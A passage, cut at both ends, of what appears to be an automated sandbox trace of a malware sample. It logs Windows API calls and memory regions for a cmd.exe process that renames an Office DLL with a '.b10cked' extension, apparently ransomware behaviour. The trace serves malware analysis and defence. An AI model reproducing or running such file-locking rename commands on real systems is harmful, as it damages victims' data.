lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ec58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ec3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ec3c*=0x1a) returned 1 [0158.672] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.672] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.673] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.673] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.673] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.673] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.673] SetConsoleInputExeNameW () returned 0x1 [0158.673] GetConsoleOutputCP () returned 0x1b5 [0158.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.673] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.673] exit (_Code=0) Process: id = "268" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xf80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21913 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21914 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21915 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21916 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21917 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21918 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21919 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21920 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21921 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 21922 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21923 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21924 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21925 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21926 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 21927 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 21928 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21929 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21930 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21931 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21932 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21933 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21934 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21935 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21936 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21937 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 21938 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21939 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21940 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21941 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21942 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21943 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21944 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 21945 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 21946 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 331 os_tid = 0x8b0 [0158.719] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff4c | out: lpSystemTimeAsFileTime=0x20ff4c*(dwLowDateTime=0x98891b80, dwHighDateTime=0x1d440a9)) [0158.719] GetCurrentProcessId () returned 0xf80 [0158.719] GetCurrentThreadId () returned 0x8b0 [0158.719] GetTickCount () returned 0x308e5 [0158.719] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff44 | out: lpPerformanceCount=0x20ff44*=21550845005) returned 1 [0158.720] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.720] __set_app_type (_Type=0x1) [0158.720] __p__fmode () returned 0x76b331f4 [0158.720] __p__commode () returned 0x76b331fc [0158.720] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.720] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.720] GetCurrentThreadId () returned 0x8b0 [0158.720] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8b0) returned 0x38 [0158.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.720] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.720] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.720] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fedc | out: phkResult=0x20fedc*=0x0) returned 0x2 [0158.721] VirtualQuery (in: lpAddress=0x20ff13, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0158.721] GetConsoleOutputCP () returned 0x1b5 [0158.721] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.721] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.721] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.721] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.721] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.722] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.722] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.722] GetEnvironmentStringsW () returned 0x320210* [0158.722] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0158.722] GetEnvironmentStringsW () returned 0x320210* [0158.722] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0158.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee4c | out: phkResult=0x20ee4c*=0x40) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0xa0, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x0, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x40, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x40, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x40, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.722] RegCloseKey (hKey=0x40) returned 0x0 [0158.722] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee4c | out: phkResult=0x20ee4c*=0x40) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x40, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x0, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x9, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x9, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x9, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.723] RegCloseKey (hKey=0x40) returned 0x0 [0158.723] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0158.723] srand (_Seed=0x5b886381) [0158.723] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"" [0158.723] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"" [0158.723] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.723] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x321970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.723] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.724] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.724] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.724] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.724] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.724] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.724] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.724] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.724] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.724] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.724] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.724] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.724] GetEnvironmentStringsW () returned 0x322360* [0158.724] FreeEnvironmentStringsW (penv=0x322360) returned 1 [0158.724] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.724] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.724] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.724] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.724] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.724] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.724] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.724] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.724] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.724] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.724] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.724] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fc18, lpFilePart=0x20fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fc14*="Desktop") returned 0x18 [0158.724] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.724] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f994 | out: lpFindFileData=0x20f994) returned 0x3209f0 [0158.725] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0158.725] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f994 | out: lpFindFileData=0x20f994) returned 0x3209f0 [0158.725] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0158.725] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f994 | out: lpFindFileData=0x20f994) returned 0x3209f0 [0158.725] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0158.725] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.725] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.725] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.725] GetEnvironmentStringsW () returned 0x320210* [0158.725] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0158.725] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.726] GetConsoleOutputCP () returned 0x1b5 [0158.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.726] GetUserDefaultLCID () returned 0x409 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fd58, cchData=128 | out: lpLCData="0") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fd58, cchData=128 | out: lpLCData="0") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fd58, cchData=128 | out: lpLCData="1") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.727] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.728] GetConsoleTitleW (in: lpConsoleTitle=0x310930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.728] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.728] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.728] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.728] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.729] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.729] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.729] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.729] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.729] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.729] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.729] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.732] GetConsoleTitleW (in: lpConsoleTitle=0x20fa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.732] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.732] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.732] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.732] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.732] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.733] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.733] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.733] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.733] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.733] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.733] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.733] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.733] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.733] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.733] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.733] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.733] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.733] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.733] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.733] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0158.733] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.733] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.733] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.733] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.733] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.733] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.734] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.734] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.734] GetVolumeInformationW (in: 